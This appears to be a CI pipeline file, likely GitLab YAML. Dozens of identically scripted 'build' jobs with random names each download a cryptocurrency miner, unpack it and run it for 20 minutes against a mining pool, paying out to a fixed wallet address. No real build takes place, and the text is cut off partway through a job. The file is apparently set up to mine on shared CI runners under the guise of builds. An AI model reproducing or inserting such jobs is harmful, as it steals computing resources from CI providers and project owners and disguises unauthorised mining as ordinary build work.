    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_265:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_2dghj5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_25ertyy:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25dfddfs:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dfser5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dfdfs5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2sety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25fgfgh:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_250:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_25dfdfe:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_2dfdfe5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25dfet:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25gfgfr:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25ddgdg:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dgdgd5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dgerer5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
   
build_2dgdgg5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dgdsew5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dfdfw5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dfdfww5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25dfdfee:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ffgfb5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25bffds:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25bfbd:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25rrecb:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25fgfgr:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2fgfr5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
   
build_2fhht5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2fgfg5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2fhfh5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2hfhf5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2fg5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2sss5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2rrr5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2rtr5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2trr5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2rrt5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ff5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25dd:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25ss:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25gg:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25ff:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25ds:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25eert:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25efeew:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25efew:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_2fdff5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2we5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2qq5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ee5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2rgrww5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2rgrr5r:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2sge45:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2rtetgeg5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_25fgfge:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dfdf5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2dgdg5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erefdty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ereerty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2edgrety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ereeeety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erttety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ertrrety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2errrtety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2errteety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ereerety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eredddty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erefdety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_2erety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eredfdety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ereertfty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eretddsy5:
  stage: build
  script:
